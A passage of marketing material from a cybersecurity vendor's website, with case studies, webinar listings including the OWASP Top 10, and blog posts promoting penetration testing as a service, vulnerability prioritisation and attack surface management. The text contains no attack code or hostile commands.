importance to the organization—and those that presented critical risk—as priority targets for penetration testing. Because the testing was integrated with vulnerability assessment on one centralized platform, the enterprise could scale pen testing as required with maximal precision.   Outcome Within 24 hours, Edgescan was able to onboard 500 websites, and within a month, the solution demonstrated it could provide accuracy across 5,000 web applications. Previously, without the Edgescan Solution, the client was assigning eight members of their security team to validate automated results. With Edgescan, they now assign just two members and deploy the remaining six staff for strategic activities. With the success of the Web Application Security Testing solution, the firm sought out Penetration Testing as a Service, and the Edgescan Platform was able to deliver this additional solution at 50% of the cost of the client’s previous pen-testing services without sacrificing any coverage or accuracy. Typical pen testing from the firm’s internal teams saw their applications hacked after four hours of testing, but following Edgescan’s intervention—and with the team’s ability to find and fix those vulnerabilities in a more efficient manner—the typical pen test now requires over 48 hours to hack those same applications. This enterprise has the budget and security acumen to effectively test all manner of security tools, from established services to the newest solutions. They can work with anyone, and each year, the Edgescan Platform is placed in a bake-off against competitors that are also vying to provide services to this client. In each of the past five years, Edgescan has conclusively won the bakeoff and continues to hold a strategic and trusted role in the overall Cyber Security Program for this sprawling international enterprise. ### A Multinational Software Firm Specializing in Customer Experience Management A young company brought Edgescan aboard to build security into their systems from the ground up, embedding best practices in their operations.   About the Client From offices in the U.K., Ireland, and Poland, the enterprise helps businesses around the world capture and analyze customer feedback. Their client companies hail from a range of different sectors but share the goal of building their businesses with customer experience at the center. The firm’s services help their clients foster customer loyalty, improve customer satisfaction, remove hurdles from the customer journey, and enhance operational efficiency.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   Onboarding The firm chose to implement Edgescan’s continuous vulnerability assessments and penetration testing on the basis of its “strong reputation and the combination of both high-tech capability and personal expertise, which gives an extra level of comfort that nothing is slipping through the gaps.” The client described the Edgescan adoption and integration process as “seamless,” raving that “the service can be deployed across the IT infrastructure almost in real time.”   Secure Growth “As new business opportunities come to us, we are seeing growing requirements and expectations in terms of information security and vulnerability assessments,” the client reports. “Having Edgescan in place covers a lot of our bases in terms of being able to meet these requirements and satisfy the requests from new and existing customers alike.” The firm’s approach includes “a healthy level of paranoia” around information security, and before partnering with Edgescan, they’d recently hired a Chief Information Security Officer to offer “deep domain expertise” to their clients. Still, they knew that no one person can work 24/7 to monitor their systems, and Edgescan’s automated approach offered that kind of capability with an added layer of ongoing protection thanks to systematic penetration testing.   Outcome With Edgescan’s round-the-clock automated monitoring fused with the enterprise’s own internal expertise, its leadership now feels the firm’s formidable level of information security is an essential benefit for their customers and a key differentiator from their competitors. Continuous vulnerability assessments through the Edgescan platform “have made it a lot easier for us to identify any gaps or concerns in our product offering,” they report, “and the amount of detail provided when a vulnerability is detected makes it easy for us to address them quickly. Plus, we can sleep more easily in the knowledge that we are doing our utmost to ensure the data of our customers and their customers is protected!” ## Whitepapers ### The Smart Vulnerability Management War Room ### Vulnerability Management Maturity Model ### A Hybrid Model for Vulnerability Management ### Edgescan Analysis of 2021 DBIR Report ### Smart Vulnerability Management for Enterprise ### Security Tools and Vendor ConsolidationRead ### Single Full-Stack Vulnerability Management Solution ### Resilient to Ransomware ## Webinars ### Problem Based Cyber Security Training, Why It Matters Our latest webinar is a Q&A with Eoin Keary and Jim Manico on why problem based training matters. This is not to be missed if you want to get the most out of your penetration testing, SAST, ASM, and risk based assessment. ### DevOps Best Practices Webinar Eoin and Jim give an introduction to DevOps and DevSecOps with a CD/CI focus. ### OWASP Top 10 Webinar Eoin and Jim sit down to take a look at the OWASP Top 10 and how they affect organizations. The OWASP Top 10 is a standard awareness document for web developers and web application security professionals. It represents a broad consensus about the most critical security risks to web applications. As software developers author code that makes up a web application, they need to embrace and practice various secure coding techniques. This training provides defensive instruction in relation to the OWASP Top Ten to aid developers in authoring secure software. A01:2021-Broken Access Control A02:2021-Cryptographic Failure A03:2021-Injection A04:2021-Insecure Design A05:2021-Security Misconfiguration A06:2021-Vulnerable and Outdated Components A07:2021-Identification and Authentication Failures A08:2021-Software and Data Integrity Failures A09:2021-Security Logging and Monitoring Failure A10:2021-Server-Side Request Forgery ### Irish Times | Cyber Security Special ### DBIR 2021 Fireside Eoin and Jim sit down to take a look at the OWASP Top 10 and how they affect organizations. The OWASP Top 10 is a standard awareness document for web developers and web application security professionals. It represents a broad consensus about the most critical security risks to web applications. As software developers author code that makes up a web application, they need to embrace and practice various secure coding techniques. This training provides defensive instruction in relation to the OWASP Top Ten to aid developers in authoring secure software. A01:2021-Broken Access Control A02:2021-Cryptographic Failure A03:2021-Injection A04:2021-Insecure Design A05:2021-Security Misconfiguration A06:2021-Vulnerable and Outdated Components A07:2021-Identification and Authentication Failures A08:2021-Software and Data Integrity Failures A09:2021-Security Logging and Monitoring Failure A10:2021-Server-Side Request Forgery ### Open And Secure Approach To Public Health Apps With NearForm And Edgescan Join NearForm’s Conor O’Neill, Edgescan’s Rahim Jina and Mark Cummins from TUDublin as they discuss how to secure open source code used in public health apps. ### Edgescan Vulnerability Landscape 2021 Webinar Where Eoin Keary, Rahim Jina, and Dan Raywood will discuss the findings from Edgescan 2021 Stats Report. ### VALIDATION – Mr Vulnerability, False Positive & Validator Learn about vulnerability management validation, false-positives, false-negatives all aspects of Edgescan’s service. From coverage of assessments to fullstack validation to production safety testing. The Edgescan Heroes & Villians are a series of characters representing cybersecurity and infosec challenges which impact us all. This webinar is the second in a series which will introduce, Validator, Mr Vulnerability & False Positive. ### CONTINUITY: Scale & Cash Burn Let’s talk about continuous, on-demand, all-you-can-eat coverage. How to scale from one application/endpoint to thousands. Edgescan delivers scale, volume and frequency without accuracy suffering. Delivery of continuous, validated vulnerability intelligence within budget. The Edgescan Heroes & Villians are a series of characters representing cybersecurity and infosec challenges which impact us all. This webinar is the third in a series which will introduce, Infinity, Scale & Cash Burn. ### Edgescan TUDublin Webinar 27th April 2020 Student Webinar including presentations from Edgescan experts. Ciaran – Working in Edgescan (00:00) Dearbhail – 2020 Edgescan Stats Report Insights (00:22) Conor – HTB Demo (00:41) ## Posts ### The Hidden Cost of Slow Penetration Testing: From Identification to Assessment You've just identified a critical application that needs penetration testing. Maybe it's for compliance, maybe you're launching a new product, or perhaps you're in the middle of an acquisition. Whatever the reason, you need results fast. But here's the reality: traditional penetration testing approaches can leave you waiting months for answers you needed yesterday. The Traditional Penetration Testing Bottleneck The conventional penetration testing process creates a frustrating timeline that can derail business-critical initiatives, particularly dangerous in today's threat landscape where 40,009 new CVEs were published in 2024 alone, a record-breaking year for vulnerability discoveries. Week 1-2: The Questionnaire Marathon Your security team receives a detailed form requiring extensive application documentation. How many URLs? How many pages per subdomain? How many forms? What are the authentication workflows? This scoping exercise alone can take a week or more to complete accurately. Week 3-4: Pricing and Approval Because each application is scoped individually based on size and complexity, you're now navigating internal approval processes for varying costs. A small application might cost X, while a larger one costs 3X. Each requires separate justification and sign-off. Week 5-10: The Lead Time Once approved, you join the queue. Most traditional penetration testing firms have lead times of 4-7 weeks for new clients. Your urgent need just became a future problem. Week 11-14: Testing and Reporting The actual penetration test takes about a month, followed by report generation and delivery. By the time you receive results, you're looking at 3-4 months from initial identification to actionable insights. In today's fast-moving business environment, that timeline can be devastating. When Speed Actually Matters This delay isn't just an inconvenience - it creates real business risks, especially given the current threat landscape: Compliance Deadlines: "Oh no, we need our penetration test completed before the end of Q2" is a conversation happening in security offices worldwide. Regulatory requirements don't wait for convenient testing schedules. With PCI DSS requiring quarterly scans and 32% of PCI failures being high or critical severity, delays can mean compliance violations. Active Exploitation Timeline: According to our 2025 Vulnerability Statistics Report, 768 CVEs were publicly reported as exploited for the first time in 2024, a 20% increase from 2023. When vulnerabilities are being actively exploited in the wild, waiting months for assessment results isn't just inefficient, it's dangerous. Merger and Acquisition Activities: When you're acquiring a company or selling to a new enterprise client, security assessments are often prerequisites. Delays in testing can derail million-dollar deals or force unfavorable negotiating positions. Our data shows that organizations have an average Mean Time to Remediation (MTTR) of 74.3 days for high and critical application vulnerabilities, delays that can't be absorbed into M&A timelines. New Product Launches: Your development team has built something revolutionary, but it can't go live until it's been thoroughly tested. Every week of delay is lost revenue and competitive advantage. This is particularly critical when you consider that SQL injection still represents 28.28% of all critical and high severity vulnerabilities discovered, yet these are entirely preventable with proper testing. Due Diligence Discoveries: We once helped a client avoid a costly mistake during an acquisition. They needed rapid testing of a target company's infrastructure. Our assessment revealed serious vulnerabilities that saved them over a million dollars on the purchase price. That value only existed because we could deliver results quickly. A Better Approach: The Enterprise Testing Model Forward-thinking organizations are solving this problem through what we call "bucket allocation", a fundamentally different approach to penetration testing at scale. The data supports this shift: our research shows that large enterprises maintain a vulnerability backlog where 45.4% of discovered vulnerabilities remain unpatched after 12 months, with 17.4% being high or critical severity. This backlog problem is directly related to the inability to test and remediate quickly. Simplified Application Definition: Instead of complex scoping questionnaires, applications are defined simply: one root domain plus all subdomains, with one authentication workflow included. Clean, straightforward, predictable. Flat-Rate Pricing: Every application costs the same, regardless of size or complexity. This eliminates the pricing delays and makes budgeting predictable. Continuous Scanning Foundation: All applications start with ongoing vulnerability scanning licenses. This means when you need a penetration test, half the work is already done. We have current baseline assessments and understand your environment. Given that network/host vulnerabilities show an average MTTR of 54.8 days compared to 74.3 days for applications, this continuous approach significantly accelerates the overall process. On-Demand Testing: When you identify the need for a penetration test, you simply allocate one from your pre-purchased bucket. Testing can begin within weeks instead of months, and results are delivered immediately upon completion. The Organizational Control Advantage Large organizations face an additional challenge: coordination across multiple teams and geographies. Development teams in different countries, security engineering groups across regions, and varying approval authorities create complexity that traditional testing models can't handle efficiently. The bucket approach solves this through intelligent tenancy management. Security leaders can allocate testing licenses to different teams at the beginning of the year. Marketing gets two tests, finance gets three, the European development team gets five. Each team can use their allocated tests when needed without going through lengthy approval processes. Leaders maintain oversight through automated notifications: "Team Europe just used one of their five allocated tests on the new customer portal. Testing begins Monday, results expected by Friday." This visibility enables better planning and ensures nothing falls through organizational cracks. The Four Pillars of Successful Testing Programs Every effective security testing program requires four elements: depth, visibility, accuracy, and scale. Traditional approaches force you to choose, you can have depth and accuracy, but it takes forever and doesn't scale. Or you can have speed and scale, but sacrifice thoroughness. The bucket model delivers all four simultaneously. You get the deep, manual assessment quality of traditional penetration testing with the speed and scale of automated solutions, all while maintaining complete visibility into your testing program across the enterprise. This is particularly important given current vulnerability trends: across the full stack, 33% of discovered vulnerabilities are critical or high severity. However, the distribution varies significantly. While only 14.8% of web application and API vulnerabilities are critical or high severity, network and infrastructure vulnerabilities show 32.2% at these severity levels. This difference underscores why organizations need both continuous scanning and on-demand deep testing capabilities. Moving Forward The question isn't whether your organization needs penetration testing, it's whether you can afford to wait months for results when business needs arise. In a world where cyber threats evolve daily and business opportunities emerge weekly, your security testing approach should enable rapid response, not create bottlenecks. Consider the current threat landscape: vulnerabilities with an EPSS score above 0.7 (indicating a 70%+ probability of exploitation) show an average MTTR of 115.7 days, while lower-probability vulnerabilities average 109.4 days. The difference is minimal, suggesting that organizations aren't effectively prioritizing based on actual exploit risk. Meanwhile, 320 vulnerabilities were added to the CISA Known Exploited Vulnerabilities catalog in 2024 alone. Consider this: if you discovered tomorrow that a critical application needed testing for a compliance audit next month, could your current approach deliver? If you're planning an acquisition that requires security due diligence, can you get reliable results quickly enough to inform your negotiating position? The cost of slow testing isn't just time. It's missed opportunities, compromised negotiations, and delayed innovations. In cybersecurity, speed and accuracy aren't opposing forces; they're both essential for success. Want to learn more about implementing rapid penetration testing for your organization? Let's discuss how this approach might work for your specific needs and timeline requirements. ### Fast Money, Loose Ends? SEPA Instant Payments Regulation Security Europe is eliminating payment delays. Single Euro Payments Area (SEPA) is and EU initiative that makes it easy for people and businesses to send and receive euro payments safely across Europe. SEPA Instant Payment Regulation (IPR) is an EU regulation that ensure that every citizen and business can send and receive money within seconds and any day of the year.Banks across the Eurozone must now process payments within 10 seconds, operate 24/7/365, and match fees to regular SEPA transfers. The first compliance deadline hit January 9, 2025. More follow through 2027.But speed creates security challenges. When money moves instantly, there's no time to catch fraud or reverse suspicious transactions. Financial institutions face new risks while racing to meet regulatory deadlines.The SEPA IPR RequirementsThe regulation demands specific capabilities:10-Second Processing: All instant payments must complete within 10 seconds. No exceptions.Always-On Availability: Systems operate 24/7/365, including holidays and weekends.Real-Time Verification: Banks must verify IBAN and name matches instantly.Live Sanctions Screening: Compliance checks happen in real-time without delays.Fee Parity: Instant payment costs cannot exceed regular SEPA transfer fees.Compliance Timeline RealityEurozone banks face immediate pressure:Receive instant payments: Already required (January 9, 2025)Send instant payments: October 9, 2025IBAN/name verification: October 9, 2025Non-eurozone countries have until 2027, but preparation starts now.Security Challenges of Instant MoneySpeed introduces new attack vectors and operational risks:No Reversal Window: Traditional fraud detection often relies on processing delays. Instant payments eliminate this safety net.Expanded Attack Surface: New APIs, modified infrastructure, and real-time processing systems create additional vulnerability points.24/7 Operational Risk: Continuous availability means no maintenance windows for security updates or system hardening.Real-Time Processing Pressure: Sanctions screening and verification must happen instantly, potentially creating shortcuts in security protocols.Beyond Compliance: Building Secure Payment InfrastructureMeeting SEPA IPR requires more than feature development. Financial institutions need security frameworks that match the speed and availability demands.Continuous Assessment: Traditional quarterly security reviews don't work when systems change rapidly to meet regulatory deadlines. Continuous vulnerability scanning identifies issues as they emerge.API Security Focus: Instant payments rely heavily on API integrations for real-time processing. These interfaces become primary attack targets and require specialized security testing.Zero-Downtime Testing: With 24/7 operational requirements, security testing must happen without service interruption. This demands sophisticated testing approaches that work in live environments.Rapid Remediation: When vulnerabilities are found in always-on systems, fixes must happen quickly without breaking instant payment availability.Practical Security MeasuresFinancial institutions preparing for SEPA IPR should consider specific security practices:Scope Expansion: Include all new and modified systems, APIs, and applications in security assessments. The rapid changes in infrastructure for IPR compliance often introduce overlooked vulnerabilities.Retesting Protocols: Verify that all identified vulnerabilities are fully resolved. With tight compliance deadlines, incomplete fixes create ongoing risk.Real-World Attack Simulation: Test how security measures perform under actual attack conditions, not just compliance scenarios.According to the 2025 Edgescan Vulnerability Statistics Report, API-related vulnerabilities account for significant portions of critical security findings. With SEPA IPR's heavy reliance on API infrastructure, this risk becomes particularly relevant for financial institutions.How Edgescan Secures Instant Payment InfrastructureSEPA IPR compliance demands security solutions built for 10-second processing speeds with zero downtime. Edgescan's approach addresses these specific challenges:API Security for Real-Time Processing: SEPA IPR systems rely heavily on APIs for instant transactions. Edgescan provides comprehensive API discovery that continuously detects APIs across your external footprint, manual API penetration testing by certified experts, and continuous API vulnerability assessment with human-validated risks. Our cloud coverage ensures security across hybrid and multi-cloud infrastructures that instant payment systems require.Continuous Vulnerability Management: Edgescan delivers continuous vulnerability scanning and assessment across both network infrastructure and application layers. This matters for SEPA IPR because systems change rapidly to meet compliance deadlines, and traditional quarterly assessments miss emerging risks.Expert-Led Penetration Testing: Edgescan's hybrid vulnerability management combines automated scanning with expert-led penetration testing services. Our certified professionals uncover hidden vulnerabilities that automated scans miss - critical for instant payment systems where a single flaw can expose real-time transactions.Risk-Based Prioritization: Edgescan prioritizes vulnerabilities based on criticality, exploitability, and business impact. For SEPA IPR environments, this means focusing remediation efforts on threats that could disrupt instant payment availability or compromise transaction security.Remediation Validation: Once vulnerabilities are fixed, Edgescan retests to confirm they've been fully resolved. This verification is essential for always-on instant payment systems where incomplete fixes create ongoing risk.PCI-Level Standards: While not directly linked to SEPA IPR, Edgescan is a certified PCI ASV (Approved Scanning Vendor). We meet rigorous industry standards set by the PCI Security Standards Council, providing additional assurance of quality, credibility, and alignment with financial services best practices.The Security-Speed BalanceSEPA IPR forces a fundamental question: How do you secure systems that must operate at unprecedented speed and availability?The answer isn't choosing between security and compliance. It's building security measures that enhance rather than hinder instant payment capabilities. This requires tools and processes designed for the new reality of always-on, real-time financial infrastructure.Ready to secure your instant payment infrastructure? Start here. ### Edgescan Now on AWS Marketplace: Seamless Security Testing, Natively Integrated with AWS As cloud-native infrastructure becomes the standard for modern enterprises, the demand for scalable, integrated security solutions has never been greater. That’s why we’re excited to announce that Edgescan is now available on the AWS Marketplace, making it easier than ever for AWS customers to access our award-winning Penetration Testing as a Service (PTaaS) and vulnerability management solution.Built natively on AWS, Edgescan delivers continuous, intelligent security testing that aligns with the way today’s organizations build, deploy, and manage applications in the cloud.Why Choose Edgescan on AWS Marketplace?By choosing Edgescan on AWS Marketplace, customers benefit from streamlined procurement, simplified billing through their existing AWS account, and the ability to integrate seamlessly into their AWS-native environments.But this isn’t just about availability, Edgescan has deep strategic alignment with AWS across architecture, integrations, and features that amplify value for AWS users:Native AWS IntegrationsEdgescan is built to integrate naturally into your AWS ecosystem. We support key AWS services to help you automate and enhance security workflows across your CI/CD pipeline and cloud infrastructure:Cloudhook Integration: Our Cloudhook for AWS allows Edgescan to automatically discover and monitor ephemeral assets spun up or down in AWS environments, enabling real-time visibility and testing without manual intervention.AWS Resource Tagging Support: We fully support AWS-native tagging, enabling customers to track and organize assets by environment, owner, or function, including short-lived or ephemeral IPs common in autoscaling and serverless environments.Auto Asset Discovery via AWS APIs: Edgescan can ingest asset data directly via AWS APIs to identify exposed services and applications, reducing the attack surface through proactive scanning.Hosted Securely on AWSEdgescan is hosted on AWS, giving you the peace of mind that your security solution is backed by AWS’s resilient, globally distributed infrastructure. This ensures enterprise-grade scalability, high availability, and compliance with the most rigorous security and data protection standards.Whether your workloads are running in Amazon EC2, AWS Lambda, Amazon EKS, or multi-cloud architectures, Edgescan scales effortlessly to meet your dynamic cloud security needs.Continuous Testing Meets Continuous DeliveryWith Edgescan’s DAST + PTaaS model, your AWS-hosted applications benefit from continuous, validated security testing. Our platform merges automated vulnerability scanning with manual expert validation, giving you high-fidelity results without the noise of false positives.And thanks to our bi-directional API, Edgescan integrates directly with your AWS-native and DevOps tooling, allowing you to orchestrate security testing as code.Benefits of Using Edgescan via AWS Marketplace• Faster procurement through AWS billing• Built-in compatibility with AWS-native tools• Automated visibility of cloud-native assets• Tag-based asset management for scalable organization• Security testing that scales with your infrastructureFinal ThoughtsBringing Edgescan to the AWS Marketplace is more than a convenience, it’s a strategic enhancement for any AWS-centric organization looking to mature their cloud security posture. Whether you’re operating a modern CI/CD pipeline or managing complex hybrid-cloud infrastructure, Edgescan helps you stay secure, agile, and audit-ready.Start your Edgescan journey today on AWS Marketplace and bring continuous, validated security testing directly into your AWS-native environment. ### Breaking the Penetration Testing Bottleneck with Edgescan's PTaaS Enterprises deploy code weekly. Some push changes daily. But traditional penetration testing still operates on quarterly schedules, creating dangerous security gaps and development delays. The numbers tell the story. According to Edgescan's 2025 Vulnerability Statistics Report, organizations take an average of 74.3 days to remediate application vulnerabilities. Meanwhile, 14.8% of application and API vulnerabilities are critical or high severity - and these require immediate attention, not quarterly assessment. The old model is broken. Schedule a test, wait for availability, discover the same technical flaws repeatedly, rush through business logic assessment, then wait weeks for a report. Meanwhile, new code ships with unknown vulnerabilities. Modern development demands modern security testing that keeps pace with agile cycles without sacrificing depth or accuracy. The Penetration Testing Logjam Traditional pen testing creates bottlenecks that slow innovation, and the data proves the impact: Limited Expert Availability: Security experts spend time rediscovering common technical vulnerabilities instead of focusing on complex threats. The 2025 report shows SQL injection still accounts for 28.28% of all critical and high severity application vulnerabilities - easily discoverable flaws that consume expert time. Point-in-Time Assessment: Testing happens once per quarter or release cycle, leaving long periods without security validation. With application vulnerability remediation averaging 74.3 days, quarterly testing means critical issues can persist for months. Rushed Business Logic Testing: Time constraints force testers to focus on easily discoverable flaws rather than sophisticated attack scenarios. The report reveals that 20% of critical vulnerabilities found through PTaaS are "unauthenticated access to sensitive resources" - complex issues that automation misses. Delayed Reporting: Lengthy report generation delays remediation while new vulnerabilities accumulate. Given that larger enterprises leave 45.4% of vulnerabilities unresolved within 12 months, every delay compounds the backlog. This reactive approach fails enterprises that need continuous security validation alongside rapid development cycles. Edgescan's Frontloaded PTaaS Solution Edgescan transforms penetration testing by frontloading the process with continuous, validated Dynamic Application Security Testing (DAST). This approach filters routine vulnerabilities before human experts engage. Continuous Validated Scanning: Intelligent DAST scanners continuously probe applications for common technical vulnerabilities. Security analysts validate each finding, ensuring high accuracy and eliminating false positives. Automated Routine Discovery: Automation handles detection of well-known vulnerabilities like SQL injection, cross-site scripting, and misconfigurations. This frees human testers from repetitive tasks. Expert Focus on Complex Threats: With technical noise filtered out, security experts dive directly into sophisticated assessments - privilege escalation, workflow bypasses, authorization flaws, and business logic vulnerabilities that automation cannot detect. Rapid, Meaningful Results: Testing cycles shorten dramatically while depth increases. Experts spend time on high-value targets instead of rediscovering basic flaws. Enterprise Benefits Development Velocity: Shortened testing cycles enable faster releases without compromising security quality. When the average remediation time is 74.3 days for applications, continuous testing identifies issues earlier in the development cycle. Scalable Coverage: Continuous scanning scales effortlessly across large application portfolios and complex environments. The report shows that malicious file upload vulnerabilities account for 13.56% of critical application flaws - issues that require consistent monitoring across all applications. Expert Efficiency: Human testers focus on sophisticated threats that require contextual understanding and creative attack techniques. PTaaS discovered business logic weaknesses and exploitation in 11% of critical findings - vulnerabilities that pure automation cannot detect. Reduced Alert Fatigue: Validated findings eliminate false positives, reducing remediation fatigue and improving team focus. With 92% of Edgescan's validation happening through automation and only 8% requiring human intervention, teams get accurate results without noise. Integrated Security: Security becomes a continuous part of the software development lifecycle rather than a checkpoint that delays releases. The Strategic Advantage Edgescan's PTaaS model removes traditional penetration testing bottlenecks by combining automation efficiency with human expertise. The latest data shows this approach works: while traditional methods struggle with the volume of vulnerabilities (over 40,009 new CVEs published in 2024), frontloaded testing focuses expert attention where it matters most.Continuous validated scanning provides proactive security coverage that scales with modern development practices. This approach delivers real risk reduction while maintaining development velocity - something traditional testing models cannot achieve when facing an average remediation backlog where 45.4% of vulnerabilities remain unresolved. Ready to break your penetration testing bottleneck? Start here. ### How Edgescan's EXF Solves Vulnerability Prioritization with EPSS and CISA KEV Security teams face an impossible challenge. Thousands of vulnerabilities flood their dashboards daily. Most will never be exploited. But buried in that noise are the critical threats that attackers will target next. Traditional CVSS scores don't solve this problem. A vulnerability rated 9.8 might sit harmlessly for years while a 6.5-rated flaw gets weaponized tomorrow. Security teams need better intelligence to separate real threats from theoretical risks. That's why Edgescan created the eXposure Factor (EXF) - a unified risk score that combines multiple intelligence sources to identify vulnerabilities that actually matter. The Prioritization Problem Most vulnerability management relies on CVSS scores alone. These technical severity ratings tell you how bad a vulnerability could be, but not how likely it is to be exploited. The result? Security teams waste time patching theoretical risks while missing active threats. Organizations need to know which vulnerabilities attackers are actually using. They need predictive intelligence about emerging threats. And they need this intelligence distilled into actionable priorities that fit their limited resources. What Makes EXF Different EXF evaluates vulnerability risk on a scale from 0 to 100 by intelligently combining three data sources: EPSS (Exploit Prediction Scoring System) uses machine learning to estimate exploitation probability. It's forward-looking and data-driven, helping identify vulnerabilities likely to be exploited soon. However, statistical modeling can sometimes overestimate or underestimate risk. CISA KEV (Known Exploited Vulnerabilities) catalogs vulnerabilities confirmed to be exploited in the wild. This provides ground-truth validation of active threats. But it's reactive and limited to known exploits. CVSS (Common Vulnerability Scoring System) adds technical severity context to complete the risk picture. The Power of Combined Intelligence By fusing these data sources, EXF delivers more nuanced and actionable risk scores than any single metric alone: Predictive Foresight: EPSS identifies vulnerabilities gaining attacker attention before they appear in exploit kits or active campaigns. Real-World Validation: CISA KEV ensures that confirmed active threats receive immediate priority, regardless of other factors. Technical Context: CVSS severity helps teams understand potential impact alongside exploitation likelihood. This layered approach enables organizations to reduce false positives, focus on vulnerabilities with both high likelihood and high impact, and shorten mean time to remediation. Practical Impact EXF helps security teams defend more effectively against ransomware and other real-world threats by prioritizing vulnerabilities that attackers actually target. Instead of chasing theoretical risks, teams can focus their limited resources on threats that matter. The result is faster remediation of critical exposures, reduced alert fatigue, and stronger defense against active attack campaigns. Strategic Vulnerability Management In a world where security teams are stretched thin, EXF provides a smarter way to manage risk. By combining the predictive power of EPSS with the real-world accuracy of CISA KEV, enhanced by CVSS technical context, EXF helps organizations stay ahead of attackers rather than just react to them. Effective vulnerability prioritization isn't about fixing everything - it's about fixing the right things first. Ready to prioritize vulnerabilities that actually matter? Start here. ### How Edgescan Cuts Through Alert Fatigue with Validated Intelligence Security teams are drowning in alerts. False positives consume 25% of their time investigating phantom threats. Critical vulnerabilities get buried in noise. Real attacks slip through while teams chase ghosts.Alert fatigue isn't just annoying - it's dangerous. When everything looks urgent, nothing gets the attention it deserves. Security teams need a way to separate signal from noise.The False Positive ProblemTraditional vulnerability scanners generate thousands of alerts. Many are false positives. Others lack context about real-world exploitability. Security teams spend hours investigating alerts that don't matter while missing the ones that do.According to Forrester's Total Economic Impact study, reducing false positives by just 50% saves hundreds of hours annually. That translates into significant cost savings and faster incident response when real threats emerge.Edgescan's Validated Intelligence ApproachEdgescan combines automated vulnerability detection with human validation and AI-powered analytics. Every alert is verified before it reaches your team. This hybrid approach ensures alerts are real, relevant, and actionable.Human Expert Validation: Our certified penetration testing team verify vulnerabilities requiring the human touch, specifically critical severity or complex contextual exposures.AI Insights from Clean Data: Our AI leverages a dataset of validated vulnerabilities - not noisy scan results. This delivers hyper-accurate tactical advice tailored to your environment, including faster triage with context-aware recommendations and actionable remediation steps aligned with your tech stack.Intelligent Prioritization: The platform combines CVSS scores with real-world exploitability data, CISA KEV listings, and EPSS ratings to focus attention on vulnerabilities that matter most.Automated validation covers 92% of all vulnerabilities using Cyber analytics coupled with AI for prioritisation, accuracy and scale. The remaining 8% verified by cyber experts and penetration testers.The Scale of the ChallengeAccording to the 2025 Edgescan Vulnerability Statistics Report, over 33% of discovered vulnerabilities were critical or high-severity. The mean time to remediate was 74.3 days for applications and APIs and 54.8 days for network infrastructure.More concerning: larger enterprises left 45.4% of discovered vulnerabilities unresolved within 12 months. This highlights the critical need for better prioritization and validation to help teams focus their limited resources effectively.Unified Platform AdvantageEdgescan delivers comprehensive security visibility through a single platform rather than multiple disconnected tools:Attack Surface Management provides continuous discovery and monitoring of your external digital footprint. Unknown assets and shadow IT get identified before attackers find them.Full-Stack Coverage spans web applications, APIs, network infrastructure, and cloud environments. Complete visibility across your technology stack eliminates blind spots.Validated Intelligence ensures every finding is verified by expert analysts, supported by technology that leverages millions of triaged vulnerabilities. This enables rapid, consistent, and accurate validation.This integrated approach means fewer tools to manage, fewer coverage gaps, and a single source of truth for vulnerability intelligence. The result is faster response times, better prioritization, and stronger security outcomes.Proven ResultsEdgescan's effectiveness shows in user feedback and measurable outcomes:G2 Rating: 4.9/5, with users consistently praising accuracy, ease of use, and the value of validated results.Gartner Peer Insights: 4.6/5 rating, with 96% of reviewers recommending the platform for its efficiency and reliability.Real-World Impact: Security teams report significant time savings, reduced alert fatigue, and improved focus on threats that actually matter.Beyond Traditional ScanningIn a world where security teams are stretched thin, Edgescan helps you focus on real threats and act confidently. The platform combines AI-driven insights, attack surface management, and full-stack visibility with intelligence validated by expert analysts.This isn't just another vulnerability scanner - it's a strategic advantage that transforms how security teams prioritize and respond to threats.Ready to cut through the noise? Start here. ### How Edgescan's CTEM Secured a Global CRM Firm's Hidden Attack Surface A global CRM firm managing sensitive customer data across thousands of web applications and APIs discovered they had a problem. Dozens of websites and APIs were running without any security oversight. Critical business systems have never been tested. Their sprawling cloud infrastructure created new blind spots every day. The firm needed complete visibility into its attack surface and a way to manage security at scale. To solve these challenges, it turned to Edgescan's Continuous Threat Exposure Management (CTEM) approach. The Hidden Risk Problem The firm's security team faced multiple critical gaps: Unknown Assets Everywhere: Dozens of websites and APIs operated without security assessment or vulnerability scanning. These shadow assets handled sensitive customer data but remained invisible to security teams. Critical API Exposure: Business-critical APIs have no security oversight. Industry reports show that APIs account for 90% of web application attacks, which creates significant risk. Cloud Deployment Chaos: Rapid cloud deployments create constant blind spots. New assets appeared faster than security teams could track them. Scale vs. Accuracy: The firm needed to assess thousands of applications without drowning in false positives or missing real threats. Edgescan's CTEM Solution Edgescan's unified security platform combines External Attack Surface Management (EASM), Risk-Based Vulnerability Management (RBVM), and Penetration Testing as a Service (PTaaS) to create comprehensive threat exposure management. Complete Asset Discovery: Edgescan's EASM solution conducts continuous asset profiling across the firm's entire digital estate. We mapped their complete attack surface using the Host Index, Discovery & Enumeration (HIDE) service, uncovering previously unknown websites and APIs. The platform integrates with AWS, Azure, and GCP to ensure that no internet-facing assets go unnoticed, eliminating shadow IT exploitation risks. API Security at Scale: Our API Security Testing module discovered tens of APIs, including several critical to core operations. Using patented multi-layer probing technology, we identified known and rogue APIs, mapping endpoints and assessing vulnerabilities like mass assignment and authorization flaws. The platform consumes OpenAPI, Swagger, and GraphQL files for thorough assessment, flagging high-severity issues for immediate remediation. Seamless Workflow Integration: New assets integrate into security assessment schedules with a single click. The firm can instantly add websites, APIs, or other assets to RBVM or PTaaS schedules. This automation eliminates manual overhead while maintaining continuous vulnerability scanning across their expanded attack surface. Real-Time Cloud Monitoring: EASM delivers continuous visibility into dynamic cloud deployments. The platform monitors IP ranges, domains, and subdomains, detecting new assets as they deploy. Customizable notifications via email, SMS, or webhooks alert teams to changes immediately. Hybrid Assessment Accuracy: Edgescan's approach combines automation with human expertise to assess thousands of applications efficiently. Our Dynamic Application Security Testing (DAST) and Network Vulnerability Management (NVM) provide full-stack coverage without compromising accuracy. The validation engine queries millions of vulnerability examples from our data lake, auto-committing low-severity issues and flagging critical ones for expert review. This eliminates false positives while delivering clear, actionable results. On-Demand Expert Testing: For critical applications and APIs, PTaaS offers rapid penetration testing by certified OSCP and CREST security experts. Deep assessments simulate real-world attacks to identify business logic flaws and exploitable vulnerabilities. The firm can schedule tests anytime with unlimited retesting at no additional cost to verify remediation. Measurable Results Complete Visibility: We 